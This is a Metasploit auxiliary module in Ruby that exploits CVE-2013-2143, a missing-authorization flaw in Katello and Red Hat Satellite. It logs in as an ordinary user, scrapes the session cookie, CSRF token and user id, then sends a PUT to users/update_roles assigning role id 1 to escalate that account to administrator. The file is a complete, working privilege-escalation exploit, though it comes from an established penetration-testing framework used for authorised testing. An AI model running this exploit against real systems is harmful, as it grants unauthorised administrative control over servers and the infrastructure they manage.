Path: blob/master/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb
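##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # A redirect back to the login form is how the application signals that the
  # request was not treated as authenticated.
  LOGIN_REDIRECT = %r{user_session/new$}

  # Session cookie set by the application; the capture is the cookie value.
  SESSION_COOKIE = /_katello_session=(\S*);/

  # Both attribute orders of the Rails csrf-token <meta> tag are accepted.
  CSRF_META_PATTERNS = [
    %r{<meta +content="(\S*)" +name="csrf-token" */?>}i,
    %r{<meta +name="csrf-token" +content="(\S*)" */?>}i
  ].freeze

  def initialize
    super(
      'Name' => 'Katello (Red Hat Satellite) users/update_roles Missing Authorization',
      'Description' => %q{
        This module exploits a missing authorization vulnerability in the
        "update_roles" action of "users" controller of Katello and Red Hat Satellite
        (Katello 1.5.0-14 and earlier) by changing the specified account to an
        administrator account.
      },
      'Author' => 'Ramon de C Valle',
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2013-2143'],
        ['CWE', '862'],
        ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=970849']
      ],
      'DisclosureDate' => 'Mar 24 2014'
    )

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('USERNAME', [true, 'Your username']),
        OptString.new('PASSWORD', [true, 'Your password']),
        OptString.new('TARGETURI', [true, 'The path to the application', '/'])
      ], self.class
    )
  end

  # Entry point. Logs in, reads the CSRF token and the numeric id of the
  # USERNAME account from the dashboard, then sends the role update for that
  # account. Every step prints an error and returns on failure, so the
  # messages printed are the only outcome of the run.
  def run
    session = login
    return if session.nil?

    dashboard = load_dashboard(session)
    return if dashboard.nil?

    update_roles(*dashboard)
  end

  # Builds the base URL of the target (scheme, VHOST and the port unless it is
  # the default 80/443) followed by the normalized TARGETURI path plus +args+.
  def target_url(*args)
    scheme = ssl ? 'https' : 'http'
    port = rport.to_i
    authority = (port == 80 || port == 443) ? vhost : "#{vhost}:#{rport}"
    "#{scheme}://#{authority}#{normalize_uri(target_uri.path, *args)}"
  end

  private

  # Step 1: authenticate with USERNAME/PASSWORD.
  # Returns the session cookie value, or nil after printing an error.
  def login
    print_status("Logging into #{target_url}...")
    # The application takes the credentials as query parameters of a GET, so
    # USERNAME and PASSWORD end up in the request line (and in the server's
    # access log) rather than in a request body.
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'user_session', 'new'),
      'vars_get' => {
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      }
    )
    return no_response unless res

    if redirected_to_login?(res)
      print_error('Authentication failed')
      return
    end

    session = extract_session(res)
    print_error('Failed to retrieve the current session') if session.nil?
    session
  end

  # Step 2: GET the dashboard with the session cookie and pull the CSRF token
  # and the user id out of the page.
  # Returns [session, csrf_token, user_id], or nil after printing an error.
  # The session is replaced by the cookie from this response when the
  # application sets one; otherwise the value passed in is kept.
  def load_dashboard(session)
    print_status('Retrieving the CSRF token for this session...')
    res = send_request_cgi(
      'cookie' => "_katello_session=#{session}",
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'dashboard')
    )
    return no_response unless res

    if redirected_to_login?(res)
      print_error('Authentication failed')
      return
    end

    session = extract_session(res) || session

    csrf_token = extract_csrf_token(res.body)
    if csrf_token.nil?
      print_error('Failed to retrieve the CSRF token')
      return
    end

    user = extract_user_id(res.body)
    if user.nil?
      print_error('Failed to retrieve the user id')
      return
    end

    [session, csrf_token, user]
  end

  # Step 3: PUT the role update for +user+ and report the outcome, which the
  # application signals in the X-Message-Type response header.
  def update_roles(session, csrf_token, user)
    print_status("Sending update-user request to #{target_url('users', user, 'update_roles')}...")
    res = send_request_cgi(
      'cookie' => "_katello_session=#{session}",
      'headers' => { 'X-CSRF-Token' => csrf_token },
      'method' => 'PUT',
      'uri' => normalize_uri(target_uri.path, 'users', user, 'update_roles'),
      'vars_post' => {
        # Presumably the administrator role id (see 'Description'); the module
        # itself does not look the id up, so it is a fixed value here.
        'user[role_ids][]' => '1'
      }
    )
    return no_response unless res

    if /success$/.match?(res.headers['X-Message-Type'].to_s)
      print_good('User updated successfully')
    else
      print_error('Failed to update user')
    end
  end

  # Prints the shared error for a missing HTTP response and returns nil.
  def no_response
    print_error('No response from remote host')
    nil
  end

  # True when the response redirects to the login form (missing Location
  # header counts as "not redirected").
  def redirected_to_login?(res)
    LOGIN_REDIRECT.match?(res.headers['Location'].to_s)
  end

  # The _katello_session cookie value from the response, or nil if not set.
  def extract_session(res)
    match = SESSION_COOKIE.match(res.get_cookies)
    match && match[1]
  end

  # The CSRF token from the first csrf-token <meta> tag that matches, or nil.
  def extract_csrf_token(body)
    CSRF_META_PATTERNS.each do |pattern|
      match = pattern.match(body)
      return match[1] if match
    end
    nil
  end

  # The numeric id of the USERNAME account, taken from the users link in the
  # dashboard page, or nil. USERNAME is escaped so a value containing regexp
  # metacharacters cannot break or widen the pattern.
  def extract_user_id(body)
    pattern = %r{/users.(\d+)#list_search=#{Regexp.escape(datastore['USERNAME'])}}
    match = pattern.match(body)
    match && match[1]
  end
end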